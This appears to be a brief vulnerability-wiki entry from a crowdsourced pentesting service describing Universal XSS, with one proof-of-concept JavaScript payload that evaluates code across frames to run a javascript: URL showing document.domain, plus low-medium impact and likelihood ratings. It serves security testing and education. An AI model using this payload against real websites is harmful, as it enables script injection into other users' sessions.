Cobalt Crowdsourced Application PentestCobalt Crowdsourced Application PentestCobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V5 - Validation/Sanitization

Universal (UXSS) XSS

POC

Send the following PoC to exploit UXSS top[0].eval(&#39;<em>=top[1];alert();</em>.location=&quot;javascript:alert(document.domain)&quot;&#39;);

Impact

Low-Medium

Likelihood

Low-Medium